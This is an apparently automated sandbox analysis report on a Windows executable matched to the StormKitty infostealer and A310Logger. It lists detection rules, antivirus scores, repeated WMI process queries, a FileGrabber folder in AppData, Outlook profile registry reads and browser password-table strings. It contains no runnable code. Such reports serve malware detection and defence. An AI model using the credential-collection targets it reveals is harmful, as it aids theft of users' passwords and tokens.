Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04E04BB1	0_2_04E04BB1
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04E04F08	0_2_04E04F08
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04E012D8	0_2_04E012D8

Source: B5U2ccQ8H1.exe, 00000000.00000002.1814837644.00000000008AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs B5U2ccQ8H1.exe
Source: B5U2ccQ8H1.exe, 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQIWWUY0857W0E5QRU76T.exe8 vs B5U2ccQ8H1.exe
Source: B5U2ccQ8H1.exe	Binary or memory string: OriginalFilenameQIWWUY0857W0E5QRU76T.exe8 vs B5U2ccQ8H1.exe

Source: B5U2ccQ8H1.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: B5U2ccQ8H1.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: B5U2ccQ8H1.exe, type: SAMPLE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: B5U2ccQ8H1.exe, type: SAMPLE	Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.0.B5U2ccQ8H1.exe.2f0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.0.B5U2ccQ8H1.exe.2f0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.0.B5U2ccQ8H1.exe.2f0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.0.B5U2ccQ8H1.exe.2f0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: B5U2ccQ8H1.exe PID: 7340, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions

Source: B5U2ccQ8H1.exe, Help.cs

Suspicious URL: 'https://api.vimeworld.ru/user/name/'

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@1/84@5/5

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe

File created: C:\Users\user\AppData\Roaming\928100

Jump to behavior

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe

File created: C:\Users\user\AppData\Local\Temp\tmpBACF.tmp

Jump to behavior

Source: B5U2ccQ8H1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: B5U2ccQ8H1.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmpA393.tmp.dat.0.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: B5U2ccQ8H1.exe	ReversingLabs: Detection: 71%
Source: B5U2ccQ8H1.exe	Virustotal: Detection: 66%

Source: B5U2ccQ8H1.exe

String found in binary or memory: \servers.dat-launcher_profiles.json/\launcher_profiles.json

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe

File read: C:\Users\user\Desktop\B5U2ccQ8H1.exe

Jump to behavior

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Section loaded: userenv.dll	Jump to behavior

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe

File written: C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: B5U2ccQ8H1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: B5U2ccQ8H1.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_00E2B2A8 pushad ; iretd	0_2_00E2B2A9
